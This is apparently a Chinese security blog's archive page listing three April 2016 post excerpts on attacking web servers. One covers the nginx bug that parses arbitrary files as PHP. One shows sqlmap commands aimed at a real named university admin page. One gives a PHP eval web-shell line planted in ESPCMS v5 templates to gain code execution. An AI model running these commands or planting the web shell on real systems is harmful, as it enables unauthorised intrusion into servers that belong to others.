04 2016 档案
摘要:漏洞介绍:nginx是一款高性能的web服务器,使用非常广泛,其不仅经常被用作反向代理,也可以非常好的支持PHP的运行。80sec发现其中存在一个较为严重的安全问题,默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析,这将导致严重的安全问题,使得恶意的攻击者可能攻陷支持php的ng
阅读全文
posted @ 2016-04-26 13:43
小生观察室
摘要:过程: D:\sqlmap>sqlmap.py -u "www.eltu.cuhk.edu.hk/staff/admin.php?staffid=1" --current-user 必须是root权限 D:\sqlmap>sqlmap.py -u "www.eltu.cuhk.edu.hk/staf
阅读全文
posted @ 2016-04-10 03:04
小生观察室
摘要:今天在espcms v5后台getshell时发现,可以在模板中插入如下代码,成功执行PHP。 <script language="php">eval($_POST[c])</script>
阅读全文
posted @ 2016-04-09 15:05
小生观察室
浙公网安备 33010602011771号